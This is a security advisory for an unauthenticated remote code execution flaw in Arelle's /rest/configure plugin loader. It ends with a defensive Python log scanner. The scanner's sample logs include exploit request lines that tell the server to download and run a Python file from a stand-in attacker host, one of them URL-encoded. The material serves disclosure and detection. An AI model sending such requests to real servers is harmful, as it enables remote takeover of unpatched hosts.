CVE-2026-42796
Published: 04 May 2026
Summary
CVE-2026-42796 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 43.9% of CVEs by exploit likelihood, is not currently listed in the CISA KEV catalog, and has a public proof-of-concept referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-14 (Permitted Actions Without Identification or Authentication) and AC-3 (Access Enforcement).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions such as the /rest/configure endpoint's plugins parameter, which enables remote code execution.
- Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.
- Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Unauthenticated RCE in the public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). The attacker-supplied URL causes a server-side download (T1105, Ingress Tool Transfer) followed by Python execution (T1059.006) with the privileges of the Arelle process.
NVD Description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Deeper analysis
CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).
Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.
Mitigation is available through upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and exploitation are provided in the Vulncheck advisory.
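As an added defensive example (not part of this advisory or of the Arelle project), the following Python checks whether a deployed Arelle version is at or above the fixed 2.39.10 release and scans web server access logs for requests that ask /rest/configure to load a plugin from a remote URL, the pattern the analysis above describes. The log lines are constructed samples in Common Log Format, and the '|' plugin separator is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Common Log Format lines for illustration; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2026:10:00:01 +0000] "GET /rest/configure?plugins=validate/EFM HTTP/1.1" 200 512
203.0.113.9 - - [04/May/2026:10:00:07 +0000] "GET /rest/configure?plugins=http://203.0.113.9/p.py HTTP/1.1" 200 128
10.0.0.5 - - [04/May/2026:10:00:09 +0000] "GET /rest/run?file=report.xbrl HTTP/1.1" 200 4096
203.0.113.9 - - [04/May/2026:10:00:12 +0000] "GET /rest/configure?plugins=HTTPS%3A%2F%2F203.0.113.9%2Fx.py HTTP/1.1" 200 128
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http:", "https:", "ftp:")
FIXED_VERSION = "2.39.10"  # first release carrying the fix, per the advisory


def is_fixed_version(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when a dotted numeric Arelle version is at or above the fixed release."""
    as_tuple = lambda v: tuple(int(p) for p in v.split("."))
    return as_tuple(version) >= as_tuple(fixed)


def remote_plugin_values(target: str) -> list[str]:
    """plugins= values of a /rest/configure request that name a remote URL.
    parse_qs percent-decodes, so an encoded scheme is still caught; splitting
    on '|' assumes that is how several plugins are listed (assumption)."""
    parts = urlsplit(target)
    if parts.path != "/rest/configure":
        return []
    values = parse_qs(parts.query).get("plugins", [])
    items = [item.strip() for v in values for item in v.split("|")]
    return [i for i in items if i.lower().startswith(REMOTE_SCHEMES)]


def flag_remote_plugin_requests(log_text: str) -> list[dict]:
    """One finding per logged request that tries to load a plugin from a URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = remote_plugin_values(m["target"])
        if hits:
            findings.append({"src": m["src"], "ts": m["ts"],
                             "status": int(m["status"]), "plugins": hits})
    return findings
```

A 200 status on a flagged request means the server accepted the remote plugin load, which on an unpatched version warrants treating the host as compromised rather than merely probed.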
Details
- CWE(s)